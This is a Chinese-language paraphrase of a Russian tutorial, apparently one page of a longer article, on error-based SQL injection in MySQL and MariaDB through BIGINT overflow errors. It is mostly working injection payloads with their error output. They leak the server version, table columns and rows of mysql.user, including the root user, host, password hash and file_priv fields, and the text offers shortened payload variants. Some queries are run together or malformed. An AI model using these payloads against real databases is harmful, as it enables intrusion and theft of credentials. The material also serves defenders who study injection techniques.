原文是俄文，不好做翻译，附上大概的内容：
这种报错注入主要基于mysql数据类型溢出
mysql > select 18446744073709551610 * 2 ;error 1690 ( 22003 ): bigint unsigned value is out of range in '(18446744073709551610 * 2)' mysql > select - 1 * 9223372036854775808 ;error 1690 ( 22003 ): bigint unsigned value is out of range in '(- (1) * 9223372036854775808)'mysql> select * 2 (if ((select * from (select (version ()) ) s), 18446744073709551610, 18446744073709551610)); error 1690 (22003): bigint unsigned value is out of range in '(2 * if (( select ' 5.5 'from dual), 18446744073709551610.18446744073709551610))'   mysql> select 2 * if((select * from (select * from test.shop) as `` limit 1)>(select * from test.shop limit 1), 18446744073709551610, 18446744073709551610); error 1690 (22003): bigint unsigned value is out of range in '(2 * if(((select `article`,`dealer`,`price` from (select `test`.`shop`.`article` as `article`,`test`.`shop`.`dealer` as `dealer`,`test`.`shop`.`price` as `price` from `test`.`shop`) limit 1) > (select `test`.`shop`.`article`,`test`.`shop`.`dealer`,`test`.`shop`.`price` from `test`.`shop` limit 1)),18446744073709551610,18446744073709551610))' // узнаем имена колонок в таблице  mysql> select 2 * if((select * from (select * from (mysql.user) limit 1) as `` limit 1)  error 1690 (22003): bigint unsigned value is out of range in '(2 * if(((select 'localhost','root','*','y','y','y','y','y','y','y','y','y','y','y','y','y','y','y','y','y','y','y','y','y','y','y','y','y','y','y','y','y','','','','','0','0','0','0','','' from dual limit 1)   需要注意的是该方法并不适用于于老版的mysql，除此之外你还需要了解错误信息的长度限制，因为这将决定你可以获取多长的信息：
mysys / my_error.c /* max length of a error message. should be kept in sync with mysql_errmsg_size. */#define errmsgsize (512)如果对象是mariadb（mysql的一个分支），当你尝试上面的方法时，你可能会看到这样的报错信息：
mysql> select 2*(if((select * from (select (version()))s), 18446744073709551610, 18446744073709551610))error 1690 (22003): bigint unsigned value is out of range in '(2 * if((select #),18446744073709551610,18446744073709551610))'作为解决方案，可以通过这种方式来解决这个问题：
mysql> select (i is not null) - -9223372036854775808 from (select (version())i)a;error 1690 (22003): bigint value is out of range in '(('5.5-mariadb' is not null) - -(9223372036854775808))'现在让我们看看能不能让我们的vector更短一些
//查询数据库版本
select 2*(if((select * from (select (version()))s), 18446744073709551610, 18446744073709551610))=select 1e308*if((select*from(select version())x),2,2)select (i is not null) - -9223372036854775808 from (select (version())i)a=select if(x,2,2)*1e308 from(select version()x)yselect 2 * if((select * from (select * from test.shop) as `` limit 1)>(select * from test.shop limit 1), 18446744073709551610, 18446744073709551610)=select 1e308*if((select*from(select*from mysql.user)``limit 1)>(select*from mysql.user limit 1),2,2)select 2 * if((select * from (select * from (mysql.user) limit 1) as `` limit 1) =select 1e308*if((select*from(select*from mysql.user limit 1)``limit 1)select 1e308*if((select user||host||password||file_priv from(select*from mysql.user limit 1)a limit 1),2,2)[1] [2]  下一页